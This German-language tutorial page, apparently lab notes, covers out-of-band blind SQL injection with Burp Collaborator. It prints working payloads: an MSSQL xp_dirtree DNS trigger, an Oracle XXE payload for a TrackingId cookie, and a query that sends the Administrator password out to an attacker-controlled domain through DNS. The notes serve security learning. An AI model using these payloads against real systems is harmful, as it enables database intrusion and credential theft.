Skip to content

6. Blind SQL Injection OAST Technik

Was sind Out of Band Techniken

Manchmal führen Apps die SQL Anragen auf einem extra Thread aus. Also es wird unabhängig von der User Response ausgeführt und somit helfen die bisherigen Methoden nicht. In manchen Situationen lassen sich solche Out Of Band Interaktionen an ein System welches wir kontrollieren triggern wodurch man dann wiederum an Informationen durch das triggern der SQL Query gelangt

Eine Anzahl an network protokolle können genutzt werden, aber am meisten typisch sind DNS Protokolle. Viele kommerzielle Netzwerke erlauben DNS Queries.

Der einfachste Weg ist es den Burp Collaborator dafür zu verwenden. Der Server bietet eine Vielzahl von Netzwerkprotokollen inkl. DNS.

Unter Microsoft SQL Server kann man mit folgenden Befehl eine Anfrage an eine eigene Domain triggern.

'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--

Das sorgt dann dafür, dass die Datenbank einen loopkup an folgende Domain ausführt. 0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net

LAB: Blind SQL injection with out-of-band interaction

  1. Wir packen an unseren TrackingID Cookie folgendes Payload um unseren Collaborator zu triggern 
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

Wenn das anschlägt haben wir die Möglichkeiten Daten zu extrahieren das könnte zB so aussehen. 

'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
Das würde das Passwort des Administrators extrahieren und einen DNS lookup an unseren Collaborator ausführen.